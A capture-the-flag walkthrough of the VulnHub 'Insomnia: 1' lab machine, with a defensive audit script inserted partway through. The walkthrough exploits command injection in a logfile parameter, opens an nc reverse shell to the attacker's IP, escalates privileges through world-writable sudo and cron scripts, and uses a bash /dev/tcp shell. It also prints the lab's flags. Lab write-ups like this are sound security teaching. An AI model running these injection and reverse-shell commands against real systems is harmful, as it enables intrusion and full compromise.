Insomnia
Author: jason_huawen
Target machine basics
Name: Insomnia: 1
Address:
https://www.vulnhub.com/entry/insomnia-1,644/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.72.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:51:64:78 1 60 PCS Systemtechnik GmbH
192.168.56.220 08:00:27:cc:a0:fd 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.220.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.220 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 04:12 EST
Nmap scan report for bogon (192.168.56.220)
Host is up (0.00013s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http PHP cli server 5.5 or later (PHP 7.3.19-1)
|_http-title: Chat
MAC Address: 08:00:27:CC:A0:FD (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds
The NMAP results show that the target host has one open port, 8080 (HTTP).
Get Access
Browsing to port 8080 on the target, the application does not seem to work properly: data cannot be submitted. Looking at the page source, there is no "submit" element, so messages cannot be sent normally.
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Chat</title>
<link rel="stylesheet" href="style.css" type="text/css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<script type="text/javascript" src="chat.js"></script>
<script type="text/javascript">
// ask user for name with popup prompt
var name = prompt("Enter your nickname:", "guest");
// default name is 'Guest'
if (!name || name === ' ') {
name = "guest";
}
// strip tags
name = name.replace(/(<([^>]+)>)/ig,"");
// display name on page
$("#name-area").html("You are: <span>" + name + "</span>");
// kick off chat
var chat = new Chat();
$(function() {
chat.getState();
// watch textarea for key presses
$("#sendie").keydown(function(event) {
var key = event.which;
//all keys including return.
if (key >= 33) {
var maxLength = $(this).attr("maxlength");
var length = this.value.length;
// don't allow new content if length is maxed out
if (length >= maxLength) {
event.preventDefault();
}
}
});
// watch textarea for release of key press
$('#sendie').keyup(function(e) {
if (e.keyCode == 13) {
var text = $(this).val();
var maxLength = $(this).attr("maxlength");
var length = text.length;
// send
if (length <= maxLength + 1) {
chat.send(text, name);
$(this).val("");
} else {
$(this).val(text.substring(0, maxLength));
}
}
});
});
</script>
</head>
<body onload="setInterval('chat.update()', 1000)">
<div id="page-wrap">
<h2>Insomnia Chat</h2>
<p id="name-area"></p>
<div id="chat-wrap"><div id="chat-area"></div></div>
<form id="send-message-area">
<h2>Your message</h2>
<textarea id="sendie" maxlength = '300' ></textarea>
</form>
</div>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/robots.txt
<!doctype html><html><head><title>404 Not Found</title><style>
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
</style>
</head><body><h1>Not Found</h1><p>The requested resource <code class="url">/robots.txt</code> was not found on this server.</p></body></html>
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ nikto -h http://192.168.56.220:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.220
+ Target Hostname: 192.168.56.220
+ Target Port: 8080
+ Start Time: 2022-11-25 04:18:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.3.19-1~deb10u1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-11-25 04:19:02 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
There seems to be a command execution vulnerability; set that aside for now and first scan for any directories or files that can be used.
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ gobuster dir -u http://192.168.56.220:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.220:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 05:46:49 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.220:8080/8d9d8218-6616-4d06-9215-7f99b4b82f9f => 200 (Length: 2899). To continue please exclude the status code or the length
gobuster aborts: as the error says, the server returns 200 (length 2899) for non-existent URLs, so the exclude option must be added.
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ gobuster dir -u http://192.168.56.220:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --exclude-length 2899 -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.220:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 2899
[+] User Agent: gobuster/3.3
[+] Extensions: sh,txt,php,html
[+] Timeout: 10s
===============================================================
2022/11/25 05:49:31 Starting gobuster in directory enumeration mode
===============================================================
/start.sh (Status: 200) [Size: 20]
/administration.php (Status: 200) [Size: 65]
/process.php (Status: 200) [Size: 2]
Progress: 1102039 / 1102805 (99.93%)===============================================================
2022/11/25 05:57:30 Finished
===============================================================
This time the scan finds 3 files; access each of them:
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ cat start.sh
php -S 0.0.0.0:8080
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/start.sh
php -S 0.0.0.0:8080
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php
You are not allowed to view : <br>Your activity has been logged
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/process.php
[]
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$
Only /administration.php looks valuable, and judging by the returned page content there may be a local file inclusion vulnerability, so first fuzz to find the parameter name:
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ wfuzz -c -u http://192.168.56.220:8080/administration.php?FUZZ=../../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 65
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.220:8080/administration.php?FUZZ=../../../../../../etc/passwd
Total requests: 4713
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002506: 200 2 L 12 W 93 Ch "logfile"
Total time: 0
Processed Requests: 4713
Filtered Requests: 4712
Requests/sec.: 0
Note that filtering with --hw here would not reveal this parameter. But using this parameter to request /etc/passwd does not return the file's contents; instead the output is:
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=../../../../../../etc/passwd
You are not allowed to view : ../../../../../../etc/passwd<br>Your activity has been logged
Try executing commands (chained commands)
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=whoami
You are not allowed to view : whoami<br>Your activity has been logged
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=chat.txt;whoami
kali
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;whoami
You are not allowed to view : /etc/passwd<br>Your activity has been logged
kali
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ curl http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;nc -e /bin/bash 192.168.56.206 5555
You are not allowed to view : /etc/passwd<br>Your activity has been logged
On Kali Linux, the shell reverse-connected from the target host is received:
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.206] 56302
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),115(bluetooth),125(scanner),141(wireshark),143(kaboxer),144(vboxsf)
Note in particular: when the link below is requested with curl, Kali Linux does get a shell back, but as soon as that shell is stabilised, i.e. when python -c 'import pty;pty.spawn("/bin/bash")' is run, the connection drops for no apparent reason, whereas requesting the same link from a browser works without problems. The output above shows what actually happened with curl: because the URL was not quoted, the local shell on Kali treated the ; as a command separator, so whoami and nc -e /bin/bash ran on Kali itself (the id output is the kali user, and the connection comes from 192.168.56.206 to 192.168.56.206), while the URL-encoded browser request below delivers the whole string to the target and yields the www-data shell.
http://192.168.56.220:8080/administration.php?logfile=/etc/passwd;nc%20-e%20/bin/bash%20192.168.56.206%205555
www-data@insomnia:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on insomnia:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on insomnia:
(julia) NOPASSWD: /bin/bash /var/www/html/start.sh
www-data@insomnia:~/html$ ls -alh /var/www/html/start.sh
ls -alh /var/www/html/start.sh
-rwxrwxrwx 1 root root 20 Dec 21 2020 /var/www/html/start.sh
www-data@insomnia:~/html$ cat /var/www/html/start.sh
cat /var/www/html/start.sh
php -S 0.0.0.0:8080
start.sh is writable by everyone, so a /bin/bash line can be appended to it.
www-data@insomnia:~/html$ echo '/bin/bash' >> /var/www/html/start.sh
echo '/bin/bash' >> /var/www/html/start.sh
Running the script through sudo should then give a shell as user julia.
www-data@insomnia:~/html$ sudo -u julia /bin/bash /var/www/html/start.sh
sudo -u julia /bin/bash /var/www/html/start.sh
[Fri Nov 25 06:40:45 2022] Failed to listen on 0.0.0.0:8080 (reason: Address already in use)
julia@insomnia:/var/www/html$ id
id
uid=1000(julia) gid=1000(julia) groups=1000(julia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
julia@insomnia:/var/www/html$
julia@insomnia:/var/www/html$ cd /home
cd /home
julia@insomnia:/home$ ls
ls
julia
julia@insomnia:/home$ cd julia
cd julia
julia@insomnia:~$ ls -alh
ls -alh
total 32K
drwxrwxr-x 3 julia julia 4.0K Dec 21 2020 .
drwxr-xr-x 3 root root 4.0K Dec 15 2020 ..
-rw------- 1 julia julia 379 Dec 21 2020 .bash_history
-rw-r--r-- 1 julia julia 220 Nov 30 2020 .bash_logout
-rw-r--r-- 1 julia julia 3.5K Nov 30 2020 .bashrc
drwxr-xr-x 3 julia julia 4.0K Dec 21 2020 .local
-rw-r--r-- 1 julia julia 807 Nov 30 2020 .profile
-rw-r--r-- 1 julia julia 86 Dec 15 2020 user.txt
julia@insomnia:~$ cat user.txt
cat user.txt
~~~~~~~~~~~~~\
USER INSOMNIA
~~~~~~~~~~~~~
Flag : [c2e285cb33cecdbeb83d2189e983a8c0]
Privilege escalation
julia@insomnia:~$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /bin/bash /var/cron/check.sh
root runs the check.sh script every minute.
julia@insomnia:~$ ls -alh /var/cron/check.sh
ls -alh /var/cron/check.sh
-rwxrwxrwx 1 root root 153 Dec 21 2020 /var/cron/check.sh
Since check.sh is world-writable, it can be modified to spawn another shell and thereby obtain root privileges.
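Both escalation steps on this box (start.sh run as julia through the sudo rule, check.sh run by root's cron) rely on the same misconfiguration: a script executed by a privileged user that any user may write to. As an added audit example, not part of the original walkthrough, the POSIX shell functions below flag such scripts in a system crontab and in saved "sudo -l" output; the file names in the stand-alone usage line are hypothetical.

```shell
#!/bin/sh
# Added audit example, not code from the original walkthrough. Both escalations on
# this box rely on one misconfiguration: a script run by a privileged user
# (start.sh via the sudo rule as julia, check.sh via root's crontab) is writable
# by everyone. These functions flag such scripts in a crontab file and in saved
# "sudo -l" output.

# world_writable PATH -> succeeds if PATH exists and its mode grants write to "others"
world_writable() {
    [ -e "$1" ] || return 1
    find "$1" -prune -perm -002 -print 2>/dev/null | grep -q .
}

# script_target CMD ARG -> the file actually executed: ARG when CMD is a shell
# interpreter (as in "/bin/bash /var/cron/check.sh"), otherwise CMD itself
script_target() {
    case "$1" in
        /bin/sh|/bin/bash|sh|bash) printf '%s\n' "$2" ;;
        *) printf '%s\n' "$1" ;;
    esac
}

# cron_writable_scripts CRONTAB -> prints "user:path" for every job in system
# crontab format (m h dom mon dow user command) whose script is world-writable
cron_writable_scripts() {
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" |
    while read -r _m _h _dom _mon _dow user cmd arg _rest; do
        target=$(script_target "$cmd" "$arg")
        if world_writable "$target"; then printf '%s:%s\n' "$user" "$target"; fi
    done
}

# sudo_writable_scripts FILE -> same check over saved "sudo -l" output, i.e. rule
# lines like "(julia) NOPASSWD: /bin/bash /var/www/html/start.sh"; prints "runas:path"
sudo_writable_scripts() {
    grep -E '^[[:space:]]*\(' "$1" |
    while read -r runas f2 f3 f4 _rest; do
        # the NOPASSWD:/PASSWD: tag is optional, so the command may be field 2 or 3
        case "$f2" in *:) cmd=$f3; arg=$f4 ;; *) cmd=$f2; arg=$f3 ;; esac
        target=$(script_target "$cmd" "$arg")
        if world_writable "$target"; then printf '%s:%s\n' "$runas" "$target"; fi
    done
}

# Stand-alone use (file names hypothetical): ./audit.sh /etc/crontab sudo_l.txt
if [ $# -ge 1 ]; then cron_writable_scripts "$1"; fi
if [ $# -ge 2 ]; then sudo_writable_scripts "$2"; fi
```

On this box the checks would report root:/var/cron/check.sh and (julia):/var/www/html/start.sh; a clean host prints nothing.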
julia@insomnia:~$ echo 'bash -i >& /dev/tcp/192.168.56.206/9999 0>&1' >> /var/cron/check.sh
<tcp/192.168.56.206/9999 0>&1' >> /var/cron/check.sh
julia@insomnia:~$
┌──(kali㉿kali)-[~/Vulnhub/Insomnia]
└─$ sudo nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.220] 59222
bash: cannot set terminal process group (9199): Inappropriate ioctl for device
bash: no job control in this shell
root@insomnia:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@insomnia:~# cd /root
cd /root
root@insomnia:~# ls
ls
root.txt
root@insomnia:~# cat root.txt
cat root.txt
~~~~~~~~~~~~~~~\
ROOTED INSOMNIA
~~~~~~~~~~~~~~~
Flag : [c84baebe0faa2fcdc2f1a4a9f6e2fbfc]
by Alienum with <3
root@insomnia:~#
Root shell obtained.
Lessons learned:
- If gobuster errors out, consider adding the exclude option;
- Wfuzz's filter parameters can give different results in different situations, and some may fail;
- When catching a reverse shell, issuing the request with command-line curl can sometimes produce an unstable shell;
- Sometimes an LFI does not manifest as file inclusion but as command execution.